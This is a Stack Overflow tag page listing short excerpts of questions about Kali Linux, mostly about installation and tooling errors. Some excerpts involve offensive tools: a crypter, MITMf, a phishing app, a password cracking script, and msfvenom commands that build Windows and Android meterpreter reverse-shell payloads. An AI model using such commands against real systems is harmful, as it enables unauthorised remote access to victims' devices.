Questions tagged [kali-linux]

Kali Linux is a special-purpose Linux distribution for penetration testing and security auditing, based on Debian. KALI LINUX QUESTIONS ON STACK OVERFLOW MUST BE PROGRAMMING RELATED. Questions about problems getting something to work on Kali, why Kali is so different from other Linux distributions, etc., are generally off-topic for Stack Overflow.

Kali Linux is a special-purpose Linux distribution for penetration testing and security auditing, based on Debian.

Nearly all questions about Kali are considered off-topic not only on Stack Overflow, but on its sister sites (e.g. Server Fault, Super User, Unix and Linux Stack Exchange). For more information about why we have this policy, please read the following FAQ: Why is Kali Linux so hard to set up? Why won't people help me?

275 questions
-1
votes
4 answers

How to install hyperion 2.2 on kali linux

I want to install hyperion 2.2 on kali linux. This version of hyperion is different than previous: there is no .cpp files (now hyperion is C). So command 'i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe' doesn't work. I've also…
WhiteServ
  • 23
  • 1
  • 2
-1
votes
1 answer

How to execute a Bash script when the OS starts (Kali Linux)

How do I set a script, written in bash, to execute when the operating system starts? I am on Kali Linux and have already added the permission of execution.
-1
votes
1 answer

How can I fix an import error in kali Linux?

While Installing Man in the Middle Framework (MITMf) i get an ImportError:No Module named capstone.. Although Capstone is already installed in my Kali Machine I downloaded MITMf from https://github.com/byt3bl33d3r/MITMf Heres what i…
-1
votes
2 answers

How to implement ARP ping with Scapy?

I've been trying to create a network scanner similar to netdiscover. I used Python and Scapy module to do that. I'm running my script on Kali linux on virtual box and when I'm scanning my NAT network created by Virtual Box it's showing me devices…
PsychoAce
  • 29
  • 1
  • 5
-1
votes
1 answer

Why setting breakpoints and running it fail (Chapter 2 shellcoder's handbook)

I reading the shellcoder's handbook and trying to attempt problems the book provides. However, given that the book was written over a decade ago, it is very hard to follow along. One of the problems I had trouble with was setting up breakpoints at…
Sam
  • 145
  • 2
  • 14
-1
votes
1 answer

E: The value 'stable' is invalid for APT::Default-Release as such a release is not available in the sources

Am new to linux and I have been struggling with the above error for a week now. The solutions am seeing are not working. How do I solve this please. E: The value 'stable' is invalid for APT::Default-Release as such a release is not available in the…
Bruno
  • 655
  • 8
  • 18
-1
votes
1 answer

upgrading ruby in a transparent way

I'm trying to upgrade my ruby from the one installed by package manager 2.5 (currently) to 2.6 using snap. this is how i'm doing this sudo snap install ruby --classic /usr/bin/ruby is symlinked to the stable ruby installed by package manager.…
pouya
  • 3,400
  • 6
  • 38
  • 53
-1
votes
2 answers

Having trouble running file in linux python

When I type python cracked.py to open file, the file does not open and goes to a new line. Why is it doing that? this is the code I'm trying to run: import crypt def testPass(cryptPass): salt = cryptPass[0:2] dictFile =…
-1
votes
1 answer

How to resolve this error while installing VSCode in Kali Linux?

I get this error code while installing. I have tried using sudo apt intall ./.deb but it gives this error Reading package lists... Done Building dependency tree Reading state information... Done You might want to run 'apt…
-1
votes
2 answers

Can't import Python script (that requires Metasploit), to MetaSploit modules

I am trying to test a vulnerability on my router using an exploit from exploit_DB. The exploit is a Python script that requires Metasploit to run . Here's a link to the exploit I am using Kali-Linux with Metasploit v4.17.3-dev. What I have tried is…
A.ALMUSBAHI
  • 21
  • 1
  • 5
-2
votes
0 answers

pls am trying to rebuild my application using apktool but i keep running into one specific error, pls help anyone....id be grateful

pls am trying to rebuild my application using apktool but i keep running into one specific error, pls help anyone....id be grateful apktool b /root/Ping1 I: Using Apktool 2.8.1 I: Checking whether sources has changed... I: Smaling smali folder into…
-2
votes
0 answers

Kali Linux: Ngrok is showing up as a different verzions of in different file paths

I'm trying to install a Blackphish a fishing app that uses ngrok as a server but when launching I get the error ./ngrok Exec format error. I've been getting the same error when trying to run ngrok with other apps as well but not when I try to run…
-2
votes
0 answers

metasploit Error: unloadable payload: android/meterpreter/reverse_tcp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=***.***.*.** LPORT=4444 R > 123.exe Error: unloadable payload: windows/meterpreter/reverse_tcp msfvenom -p android/meterpreter/reverse_tcp LHOST=***.*.** LPORT=4444 R > 123.apk Error: unloadable…
-2
votes
0 answers

Capture the Flag

I'm new to the cybersecurity domain and I'm solving a Capture the Flag problem. It has an IP address and a port to connect to. I'm using Kali Linux to run the nc (netcat) command to execute that IP with the port address. When the command executes,…
-2
votes
0 answers

How to do ADB connect Kali in Virtual box on Win 10 and Android studio emulator

I tried many options to connect with adv but always I receive connection refused. My setup is following: Kali is in Virtual Box on Win 10. Kali has NAT network with IP 10.0.2.15 with no port forwarding. Android Studio is on the sam Win 10 machine…
rickyk
  • 19
  • 2